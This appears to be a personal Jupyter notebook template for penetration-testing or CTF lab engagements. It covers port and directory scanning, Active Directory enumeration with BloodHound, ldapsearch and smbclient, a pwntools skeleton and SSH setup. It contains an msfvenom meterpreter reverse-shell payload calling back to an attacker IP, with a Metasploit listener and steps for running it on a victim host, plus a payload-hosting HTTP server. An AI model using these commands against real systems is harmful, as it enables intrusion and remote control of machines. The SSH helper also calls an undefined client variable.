# TEMPLATE

## Engagement Notes

# Enumeration

### Set variables for further engagement

In [ ]:
import requests
from pprint import pprint

source =! ip address | grep tun | grep 10 | tr "/" " " | awk '{print $2}'
public_source = requests.get('https://ifconfig.co/ip').text
target = 'TEMPLATE'

print(f"source: {source}")
print(f"target: {target}")

### Port scan target

In [ ]:
!docker run -it --rm -v $(pwd):/app/target rustscan -a $target

### URL scan target

In [ ]:
!gobuster dir -u http://$target -w $(wordlists_path)/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -x txt,js,html,php -t 40 --timeout=6s -o gobuster-task.txt --retry

# Revshell generator

```sh
# On attack box
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.28 LPORT=9999 -f exe > shell.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.10.14.28
lhost => 10.10.14.28
msf6 exploit(multi/handler) > set lport 9999
lport => 9999
msf6 exploit(multi/handler) > run

# On victim
*Evil-WinRM* PS C:\Users\steph.cooper\Downloads> ./shell.exe
```

## Windows

### Start Bloodhound

In [ ]:
!mkdir -p ./bloodhounddumps
!docker compose --project-directory ~/.local/build/programs/bloodhound --progress quiet down 
!docker compose --project-directory ~/.local/build/programs/bloodhound --progress quiet up -d
print("Connect to bloodhound now at http://localhost:8080 with username 'admin' password 'bloodhound'")
print("To reset the entire instance, do docker compose down --volumes")

In [ ]:
domain = target.split(".")[0]
domain_spn = ','.join([f"dc={dc}," for dc in target.split(".")])
initialuser = ""
initialpassword = ""

### Enumerate

In [ ]:
!enum4linux-ng $target -u $initialuser -p initialpassword

In [ ]:
!smbclient -L //$target -U '{domain}/{initialuser}'%'{initialpassword}'

In [ ]:
!bloodhound-python -u $initialuser -p $initialpassword -d $domain -dc $target -c All

In [ ]:
!ldapsearch -x -H ldap://$target -D '{domain}\{initialuser}' -w $initialpassword -b $domain_spn '(objectClass=person)'

## Process Data

In [ ]:
from chepy import Chepy

exampleinput = 'flaghere'

encodedinput = (
        Chepy(exampleinput)
        .rot_13()
        .to_base64()
        .str_to_hex()
    )

print(encodedinput)

encodedoutput = (
    Chepy(str(encodedinput))
        .hex_to_str()
        .from_base64()
        .rot_13()
    )

print(encodedoutput)

aesencoded = Chepy("moreflag").aes_encrypt("secret password!", mode="ECB", key_format="str").o
print(aesencoded)
aesdecoded = Chepy(aesencoded).aes_decrypt("secret password!", mode="ECB", key_format="str").o
print(aesdecoded)

# Exploit

## Local HTTP server

In [ ]:
# Need all this to run a forked server but keep the output 
# where I can see it while still being able to execute other cells.

# This is just as easily `python -m http.server 8080` in a terminal

import psutil
import socket
from time import sleep
from multiprocessing import Process
from http.server import HTTPServer, SimpleHTTPRequestHandler

def server():
    pids = [conn.pid for conn in psutil.net_connections() if conn.laddr.port == 8080]
    if len(pids) > 0:  
        psutil.Process(pids[0]).terminate()
        sleep(1) # Need a little time to kill process before trying to use port again
    httpd = HTTPServer(('localhost', 8080), SimpleHTTPRequestHandler)
    httpd.serve_forever()

server = Process(target=server, args=())
server.start()

In [ ]:
!echo "Run '/usr/local/bin/ngrok tcp 8080' to port forward"

## pwntools

In [ ]:
from pwn import *

# Set up pwntools for the correct architecture
context.update(arch='amd64')
context.terminal = ['ghostty', '-e']
exe = './'
elf = context.binary = ELF(exe, checksec=False)

def start(argv=[], *a, **kw):
    return process([exe] + argv, *a, **kw)

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

io = start()

io.close()


## SSH Establish

In [ ]:
# set up paramiko ssh client
user = {
    'username': '',
    'password': ''
}
import paramiko
ssh_user = paramiko.SSHClient()

# set up ssh client
ssh_user.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# connect to ssh
ssh_user.connect(target, username=user['username'], password=user['password'])

def user(command):
    stdin, stdout, stderr = ssh_lennie.exec_command(command)
    return stdout.readlines()

# Post Notes